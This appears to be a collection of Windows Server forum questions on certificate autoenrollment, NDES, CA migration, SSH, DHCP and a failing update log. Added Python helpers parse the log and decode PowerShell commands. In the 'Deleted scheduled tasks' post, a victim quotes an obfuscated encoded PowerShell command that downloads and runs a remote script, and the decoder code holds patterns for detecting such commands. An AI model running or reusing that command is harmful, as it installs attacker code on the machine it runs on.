
Certificate autoenrollment and auto-renewal


Hi there,

Some time back, we issued client authentication certificates based on a duplicated template that is being used for Cisco AnyConnect VPN client 4.4 and wireless access. The certificates are set to expire beginning mid-June this year (about 2.5 months away), with the renewal period set to 6 weeks. I've encountered a couple of situations where having two certificates of the same type in the same client certificate store caused issues, though in both cases it involved all certificates in question being valid (e.g. not expired, able to access CRLs, chained properly, and so on). My questions:

1. When these certificates start to auto-renew (we have a GPO set up for this), do I need to be concerned about having two valid certificates of the same type present?

2. When the older of the two certificates does expire, could the VPN app or wireless get hung up on the expired certificate and not use the new one?

3. If I do need to be concerned about duplicate valid/invalid certificates, what are my options?

4. The template in question was set to publish to AD but not to automatically re-enroll if a duplicate cert exists in AD for the original certificate rollout. I've read for the most part that publishing certs to AD is not really recommended. Is it okay to set the renewed certificates not to publish to AD, or are there hazards in doing that due to inconsistency?

Thanks so much and my apologies for such a long post.

Chad


Can I issue multiple templates or no template at all from NDES?


I have a Windows Server 2016 running with ADCS and NDES configured. I call the NDES endpoint by creating a CSR through a script I have prepared that acts as a SCEP client. Is there a way for NDES to just sign any CSR (through the CA, of course) that comes its way, or will it only issue certs based on the template configured in the registry?

Let's say I want to issue 4 types of certificates, all of which have key usage set to both signing and encryption. Can I somehow have one NDES server issue these 4 types of certs (essentially meaning just sign any CSR that comes its way), or will I have to deploy multiple NDES endpoints, each issuing one particular type?

Protected Users group - Event ID 100 - NTLM authentication failed


Got a test environment for some testing...

1 DC, Server 2016

A few member servers, 2016

When I add the user to the Protected Users security group he cannot log on. Thoughts?

Thank you


What does “tattooing” the Registry mean?


“Tattooing” the registry means a user can modify and view user preferences that are not stored in the maintained portions of the Registry. Even if the group policy is changed or removed, the user preferences will still persist in the registry.

Windows Server 2016 Failover Cluster certificate


Hi all,

As you might know, when creating a failover cluster, Windows Server 2016 generates a self-signed certificate and installs it to all nodes. 

Because these certificates expire in one year, we got monitoring alerts. To fix these alerts, some certificates were removed from the cluster nodes. Since then, we've been unable to add new cluster nodes to the cluster due to schannel issues. I suspect the removal of the cluster certificates is the cause.

Is there any way to renew or replace failover cluster certificates? I cannot find a thing on Google about this, only that Windows Server 2016 uses certificates for failover clustering. 

Auto enrollment for Domain controller certificate with subject alternative name


Hi,

We need an auto-enrollment template for domain controller certificates which can have a SAN as well. By the normal method, the auto-enrolled domain controller certificate will contain only the FQDN of the server. We need to include a SAN in the domain controller certificate as well. Is there any way we could accomplish this?

Thanks and Regards

SSH asking for password even though I have a private key


Hi,


I am trying to establish a connection to a Windows server machine using RSA key pairs. I have generated the key pair and also copied my public key to users/myuser/.ssh/authorized_keys, and also set the permissions by executing the command below.

ssh --% user1@domain1@contoso.com powershell -c $ConfirmPreference = 'None'; Repair-AuthorizedKeyPermission C:\Users\user1\.ssh\authorized_keys

When I try to connect to that server using ssh-agent or PuTTY, it asks me to type a password and does not do any key-based authentication. I have tried different approaches but am clueless. Can anyone tell me what I am doing wrong here?

Thanks,

Venkata


Unable to execute Windows script from SSH


Hi,

I have a batch file to run my jar file on a Windows virtual machine. This script is located at D:\Scripts\run_services.bat.

Below are the commands in the batch file:

@ECHO off
start java -jar D:\NSXJarfiles\BulkSolve-0.0.1-SNAPSHOT.jar 

I am trying to connect to the VM and execute the batch file run_services.bat from my laptop, using the command below:

ssh -v -o StrictHostKeyChecking=no -l uname  ip  "D:\Scripts\run_services.bat"  

But I did not see the script execute and start the Java jar file on the machine.

When I run the script on that machine it works fine and starts the Java jar file. Can anyone tell me what I have to do to execute this batch file over SSH?

Thanks,

Venkata


Stop DHCP from giving out IPs to computers that do not have valid domain accounts.


At my company we have a DHCP server that happily gives out IP addresses to everyone.

"Everyone is the problem"

Since DHCP, as far as I am aware, does not have any inbuilt auth capabilities, does anyone have a solution whereby IP addresses can be dynamically assigned based on valid user credentials?

I know that MS has introduced NAP, but I am trying to limit users from just jacking into the network and getting a free IP address from the Win 2008 server.

Could it be done with RADIUS instead?

 

Any insight or comments would be very welcome.

 

Thanks Paul.

KB4489878


KB4489878 will not install on 2008 R2 servers in our environment.

It fails; I have tried several times.

Anyone with a similar problem or a solution, please?

Microsoft CA LDAP path


Hi All,

I am setting up a two-tier Microsoft CA; the root is offline and the subCA is online.

I added the CRL HTTP location in the root CDP and issued a certificate to the subCA, but did not add the LDAP location in the subCA certificate. Is this recommended, having the certificate issued to the subCA without an LDAP location?

I need your guidance and input on this.


Error KB4489878 2008 R1


When you install update KB4489878 from Windows Update, it fails. (Windows Server 2008 R2)

The error is:

2019-04-02 10:20:05:242  860 1a10 DnldMgr Asking handler to generate non-range requests.
2019-04-02 10:20:05:242  860 1a10 Handler Generating request for CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E in sandbox C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc
2019-04-02 10:20:05:242  860 1a10 Handler Selecting self-contained because update does not have express payload.
2019-04-02 10:20:05:242  860 1a10 Handler Selected payload type is ptSelfContained
2019-04-02 10:20:05:242  860 1a10 Handler Detected download state is dsStart
2019-04-02 10:20:05:242  860 1a10 Handler Adding Windows6.1-KB4489878-x64.cab (entire file) to request list.
2019-04-02 10:20:05:242  860 1a10 Handler Request generation for CBS update complete with hr=0x0 and pfResetSandbox=0
2019-04-02 10:20:06:272  860 1a10 Misc Validating signature for C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc\Windows6.1-KB4489878-x64.cab with dwProvFlags 0x00000080:
2019-04-02 10:20:07:723  860 1a10 Misc  Microsoft signed: Yes
2019-04-02 10:20:07:723  860 1a10 DnldMgr Asking handler to generate non-range requests.
2019-04-02 10:20:07:723  860 1a10 Handler Generating request for CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E in sandbox C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc
2019-04-02 10:20:07:723  860 1a10 Handler Selecting self-contained because update does not have express payload.
2019-04-02 10:20:07:723  860 1a10 Handler Selected payload type is ptSelfContained
2019-04-02 10:20:07:723  860 1a10 Handler Detected download state is dsHavePackage
2019-04-02 10:20:07:723  860 1a10 Handler Request generation for CBS update complete with hr=0x0 and pfResetSandbox=0
2019-04-02 10:20:07:723  860 265c AU Launched new AU client for directive 'Download Approval', session id = 0x2
2019-04-02 10:20:07:738 5040 3014 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:07:738 5040 3014 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:07:738 5040 3014 AUClnt Launched Client UI process
2019-04-02 10:20:07:754 5040 3014 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:07:754 5040 3014 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:07:754 5040 3014 Misc   = Module: C:\Windows\system32\wucltux.dll
2019-04-02 10:20:07:754 5040 3014 CltUI AU client got new directive = 'Download Approval', serviceId = {7971F918-A847-4430-9279-4A52D1EFE18D}, return = 0
2019-04-02 10:20:07:816 11848 27a0 COMAPI -------------
2019-04-02 10:20:07:816 11848 27a0 COMAPI -- START --  COMAPI: Install [ClientId = wusa]
2019-04-02 10:20:07:816 11848 27a0 COMAPI ---------
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Allow source prompts: Yes; Forced: No; Force quiet: No
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Updates in request: 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - ServiceID = {6A498F13-AD63-44DA-A31F-39ADA0DDC6AF} Third party service
2019-04-02 10:20:07:816  860 1da4 Agent *************
2019-04-02 10:20:07:816  860 1da4 Agent ** START **  Agent: Installing updates [CallerId = wusa]
2019-04-02 10:20:07:816  860 1da4 Agent *********
2019-04-02 10:20:07:816  860 1da4 Agent   * Updates to install = 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Updates to install = 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI <<-- SUBMITTED -- COMAPI: Install [ClientId = wusa]
2019-04-02 10:20:07:816  860 1da4 Agent   *   Title = Security Update for Windows (KB4489878)
2019-04-02 10:20:07:816  860 1da4 Agent   *   UpdateId = {00B91A79-94CE-4E82-BA5F-5E8CE88C0F64}.501
2019-04-02 10:20:07:816  860 1da4 Agent   *     Bundles 1 updates:
2019-04-02 10:20:07:816  860 1da4 Agent   *       {1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E}.501
2019-04-02 10:20:08:362  860 1da4 Agent WARNING: failed to calculate prior restore point time with error 0x80070002; setting restore point
2019-04-02 10:20:08:362  860 1da4 Agent WARNING: LoadLibrary failed for srclient.dll with hr:8007007e
2019-04-02 10:20:08:362  860 1da4 Handler Attempting to create remote handler process as MADAP8017\Administrator in session 3
2019-04-02 10:20:08:378  860 1da4 DnldMgr Preparing update for install, updateId = {1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E}.501.
2019-04-02 10:20:08:393 10192 2618 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:08:393 10192 2618 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:08:393 10192 2618 Misc   = Module: C:\Windows\system32\wuaueng.dll
2019-04-02 10:20:08:393 10192 2618 Handler :::::::::::::
2019-04-02 10:20:08:393 10192 2618 Handler :: START ::  Handler: CBS Install
2019-04-02 10:20:08:393 10192 2618 Handler :::::::::
2019-04-02 10:20:08:409 10192 2618 Handler Starting install of CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E
2019-04-02 10:20:08:799 10192 2618 Handler CBS package identity: Package_for_RollupFix~31bf3856ad364e35~amd64~~7601.24385.1.9
2019-04-02 10:20:08:815 10192 2618 Handler Installing self-contained with source=C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970\Windows6.1-KB4489878-x64.cab, workingdir=C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970\inst
2019-04-02 10:20:13:370  860 195c Report REPORT EVENT: {66649B29-CBDF-4DAA-B3EE-6F969812A173} 2019-04-02 10:20:08:362+0100 1 181 101 {00B91A79-94CE-4E82-BA5F-5E8CE88C0F64} 501 0 wusa Success Content Install Installation Started: Windows successfully started the following update: Security Update for Windows (KB4489878)
2019-04-02 10:20:33:619  860 2bbc AU Getting featured update notifications.  fIncludeDismissed = true
2019-04-02 10:20:33:619  860 2bbc AU No featured updates available.
2019-04-02 10:23:17:309 10192 2790 Handler FATAL: CBS called Error with 0x80070002,
2019-04-02 10:23:21:365 10192 2618 Handler FATAL: Completed install of CBS update with type=0, requiresReboot=0, installerError=1, hr=0x80070002
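To name the failure rather than just quote it, here is an added Python triage helper (not from the original post) that parses the WindowsUpdate.log format shown above (timestamp, PID, TID, component, message), pulls the CBS package identity and the terminal FATAL result, and unpacks the HRESULT into its Win32 error code. The sample log is three lines taken from the excerpt above; the Win32 name table is a constructed subset.

```python
"""Triage a WindowsUpdate.log excerpt: package identity, final HRESULT, Win32 code."""
import re
from typing import Dict, List, Optional

# One agent log line: date, time with ms, PID, hex TID, component, free-text message.
LINE_RX = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}:\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>[0-9a-f]+)\s+(?P<component>\S+)\s+(?P<msg>.*)$"
)
HEX_RX = re.compile(r"0x([0-9A-Fa-f]{8})")          # any 32-bit HRESULT in a message
PKG_RX = re.compile(r"CBS package identity: (\S+)")

# Constructed subset of Win32 error codes, enough for the log above.
WIN32_NAMES = {2: "ERROR_FILE_NOT_FOUND", 3: "ERROR_PATH_NOT_FOUND", 5: "ERROR_ACCESS_DENIED"}

# Sample input: three lines copied from the log excerpt in the post above.
SAMPLE_LOG = """\
2019-04-02 10:20:08:799 10192 2618 Handler CBS package identity: Package_for_RollupFix~31bf3856ad364e35~amd64~~7601.24385.1.9
2019-04-02 10:23:17:309 10192 2790 Handler FATAL: CBS called Error with 0x80070002,
2019-04-02 10:23:21:365 10192 2618 Handler FATAL: Completed install of CBS update with type=0, requiresReboot=0, installerError=1, hr=0x80070002
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into its fields, or None if it is not an agent line."""
    m = LINE_RX.match(line.strip())
    return m.groupdict() if m else None


def hresult_to_win32(hr: int) -> Optional[int]:
    """HRESULT_FROM_WIN32 sets the severity bit, facility 7 (FACILITY_WIN32) and
    stores the Win32 code in the low 16 bits; return that code or None if the
    HRESULT is not a wrapped Win32 error."""
    severity = hr >> 31
    facility = (hr >> 16) & 0x1FFF
    if severity == 1 and facility == 7:
        return hr & 0xFFFF
    return None


def summarize(log_text: str) -> dict:
    """Collect the package identity and the last FATAL HRESULT seen in the log."""
    package: Optional[str] = None
    fatal_hrs: List[int] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        pkg = PKG_RX.search(rec["msg"])
        if pkg:
            package = pkg.group(1)
        if "FATAL" in rec["msg"]:
            fatal_hrs.extend(int(h, 16) for h in HEX_RX.findall(rec["msg"]))
    final_hr = fatal_hrs[-1] if fatal_hrs else None
    win32 = hresult_to_win32(final_hr) if final_hr is not None else None
    return {"package": package, "final_hr": final_hr,
            "win32": win32, "win32_name": WIN32_NAMES.get(win32)}
```

For the excerpt above the summary resolves hr=0x80070002 to Win32 error 2, ERROR_FILE_NOT_FOUND, which is the fact to carry into CBS.log rather than the bare HRESULT.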

New Server 2016 CA - Certificate Template Questions


Hi All,

I am in the process of building 2016 certificate servers to replace the existing 2008 servers. There are already a number of certificate templates published on the 2008 server. I want to do a cleanup and keep the bare minimum. These are the currently published templates.


I just want to confirm a couple of things.

1. Do I need the Basic EFS template when I have "encrypting file system" added to the user template?

2. If I publish Kerberos Authentication, can I get rid of the Domain Controller and Domain Controller Authentication templates? What would be the security settings on the Kerberos template? Would it be permissions for domain controllers only?

3. I have already set up a KRA service account and enabled it as a key recovery agent.

    a) Do I need to set up BitLocker and EFS recovery agents as well to decrypt files if a user leaves, etc.?

    b) Can I just add the BitLocker Drive Encryption, BitLocker Data Recovery Agent and File Recovery application policies to the KRA template and use the same certificates published via Group Policy to perform these tasks?

Any help is highly appreciated.


Build an Enterprise CA in a domain which has a domain joined Standalone CA


I have a standalone CA in my environment which is domain joined for some reason which I am not aware of, nor have I any documentation suggesting the reason. This is currently used for multiple application-related (non-domain and domain-related) certificate signing activities (I am aware of the fact that this is not a recommended procedure). I would now like to build a new Enterprise CA, while still using this standalone CA in the environment (I will consider moving it to a workgroup). Please suggest how I can achieve this without any conflicts. On all desktops and laptops, I see the certificate for the standalone CA added in the "Trusted Root Certification Authorities" store [MMC --> Certificates (Local Computer) --> Trusted Root Certification Authorities --> Certificates]. This CA is not part of the "Cert Publishers" group in AD.

-- JPM

Folder Security


Hi All,

I have an issue with folder security. I created a folder and, in Security, the Administrators group is added. In AD Users, I added the user to the Administrators group. This should allow the user to access the folder, but when I click the folder it says there is no permission to access it.

Setup:

1. Folder Setup



2. Account 

3. Output


Migrate CRL (HTTP) and OCSP to new CA server


Hi There,

We have to migrate certificate authority servers currently running on Windows 2008R2 to new Windows 2016 servers.

We have 1 offline root CA and 2 Enterprise CA servers. One of the Enterprise CA servers is also configured to host the CDP (http://crl.contoso.com) and OCSP.

I wonder whether the IIS configuration related to CDP and OCSP is backed up when backing up the CA server configuration? Can you please throw some light on how to migrate these services to the new server properly, and on a rollback approach?

Thanks in advance!


Mahi

Deleted scheduled tasks are still being performed


My server was hacked by others.

There are some scheduled tasks that run a PowerShell command. I deleted all of them, but those tasks are still running. What should I do?

Here is the PowerShell command:

HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA
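A command line like the one above hides what it does behind an -e (EncodedCommand) blob, so the first triage step is to decode it and flag the download-and-execute indicators. The following Python helper is an added example, not part of the original post: it finds the encoded-command switch in a PowerShell command line, decodes the UTF-16LE base64 payload, and reports indicator hits, suspicious switches and any URLs so the decoded text can be hunted for in other persistence locations. The sample command line is constructed with a placeholder host, not the one in the post.

```python
"""Decode and triage a PowerShell -EncodedCommand command line."""
import base64
import re
from typing import Dict, List, Optional

# Indicators a defender looks for in the decoded text.
INDICATORS: Dict[str, re.Pattern] = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "web_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
}
URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)
# Switches that weaken logging or policy: -nop (NoProfile), -ep/-ex Bypass, -w hidden.
SUSPICIOUS_SWITCH_RX = re.compile(r"^-(nop|noprofile|ep|ex|executionpolicy|w|windowstyle)$", re.I)


def encode_command(text: str) -> str:
    """Produce the base64 form PowerShell expects (UTF-16LE); used to build samples."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command; tolerates stripped base64 padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the argument following -e / -ec / ... / -EncodedCommand, if any.
    PowerShell accepts any unique prefix of 'EncodedCommand', so match by prefix;
    -ep (ExecutionPolicy) does not qualify because 'p' is not a prefix of it."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def triage(cmdline: str) -> dict:
    """Decode the payload (if present) and summarise what it contains."""
    switches = [t for t in cmdline.split() if SUSPICIOUS_SWITCH_RX.match(t)]
    payload = extract_encoded_payload(cmdline)
    if payload is None:
        return {"encoded": False, "decoded": None, "hits": [], "urls": [], "switches": switches}
    decoded = decode_encoded_command(payload)
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"encoded": True, "decoded": decoded, "hits": hits,
            "urls": URL_RX.findall(decoded), "switches": switches}


def build_sample_cmdline() -> str:
    """Constructed sample mirroring the shape of the post's line, with a placeholder host."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://staging.example.invalid/g')"
    return "powershell.EXE -nop -ep bypass -e " + encode_command(script)
```

Once decoded, the URL and the IEX/DownloadString pattern are what to search for in scheduled task actions, WMI event subscriptions and services, since tasks that reappear after deletion are usually recreated by another persistence mechanism.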

CertUtil: The RPC server is unavailable


Hi,

If I run the command as administrator from a client computer: certutil -ping -config ****
I get a response.
If I run the same command as a standard user, I receive:
Server could not be reached: The RPC server is unavailable. 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE) -- (31ms)

CertUtil: -ping command FAILED: 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE)
CertUtil: The RPC server is unavailable.

Thx,

borut


BlatniS

Kerberos version in Windows Server 2016


Hi,

How do I find the Kerberos version of Windows Server 2016? Can someone share the path or command to find it?

How to generate internal CA certificate on Windows domain


Hi all,

I am a cert newbie but have been given the task of providing some internal certificates for some new servers in our Windows domain. The web development team have sent me some .req files. We have two internal CA servers, one for root and one for intermediate, but I'm not sure exactly how to fulfil the requests. I tried "Submit new request" and then pointed to the .req file, but I got the error below.

"The request contains no certificate template information 0x80094801 CERTSRV_E_NO_CERT_TYPE

Denied by Policy Module 0x80094801. The request does not contain a certificate template extension or the CertificateTemplate request attribute."

Any advice appreciated - thanks!
